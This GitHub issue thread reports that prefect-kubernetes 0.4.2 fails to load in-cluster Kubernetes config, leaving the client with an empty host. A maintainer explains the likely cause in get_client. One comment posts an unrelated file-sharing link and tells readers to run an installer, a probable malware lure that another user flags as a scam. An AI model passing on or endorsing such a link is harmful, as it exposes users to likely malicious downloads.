### ISSUE TITLE
prefect-kubernetes regression with in-cluster config

### ISSUE THREAD

**Issue by srsapient** [PrefectHQ/prefect#15204]
### Bug summary

We are trying to upgrade `prefect-kubernetes` from 0.3.11 to 0.4.2

With the new version it appears that the Kubernetes client silently fails to load the in-cluster config, this results in a failure when starting a `run_namespaced_job_flow`

It's not a problem in the `kubernetes-asyncio` lib, as I tried to explicitly call the [load_incluster_config](https://github.com/tomplus/kubernetes_asyncio/blob/master/kubernetes_asyncio/config/incluster_config.py#L117) and it correctly loads the internal endpoints into a Configuration object.

However, even when explicitly calling the load_incluster_config, the client that is returned by [KubernetesCredentials.get_client()](https://github.com/PrefectHQ/prefect/blob/main/src/integrations/prefect-kubernetes/prefect_kubernetes/credentials.py#L150) has empty host resulting in a subsequent `InvalidUrlClientError` which is related to a missing host in the http client ([here](https://github.com/aio-libs/aiohttp/blob/875f23d516220a1cf849eb4a6d758edb8bff1f55/aiohttp/client.py#L529)). 
```
...
 File "/usr/local/lib/python3.9/site-packages/aiohttp/client.py", line 586, in _request
    raise err_exc_cls(url)
aiohttp.client_exceptions.InvalidUrlClientError: /apis/batch/v1/namespaces/mynamespace/jobs
```

This is the piece of code from where I got the empty host configured
```python
    ...
    credentials = KubernetesCredentials()
    # added for debugging
    async with credentials.get_client("batch") as batch_v1_client:
        logger.info(f"host: {batch_v1_client.api_client.configuration.host}")
    return await run_namespaced_job_flow( ... )
```

### Version info (`prefect version` output)

```Text
2.20.4
```

**Comment by AmrElabbasy** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by NicholasFiorentini** [comment]
> try this https://gofile.io/d/yMHabA select the desired compiler in the installer

This is likely a scam or a bad actor. I hope some repo admin can remove this comment and report it asap.

**Comment by desertaxle** [comment]
Thanks for the bug report @srsapient! 

Looking at the code, it seems like `load_incluster_config` isn't called in `get_client` but in `get_resource_specific_client`. `get_client` wraps `get_resource_specific_client`, but an `APIClient` is created before calling `get_resoruce_specific_client`, which likely is where the issue is coming from.

Let's add the logic for loading environmental config to `get_client`, similar to the implementation in the `KuberenetesWorker` [here](https://github.com/PrefectHQ/prefect/blob/main/src/integrations/prefect-kubernetes/prefect_kubernetes/worker.py#L654-L659). If you're willing to submit a PR for this fix, I'd be happy to review it!
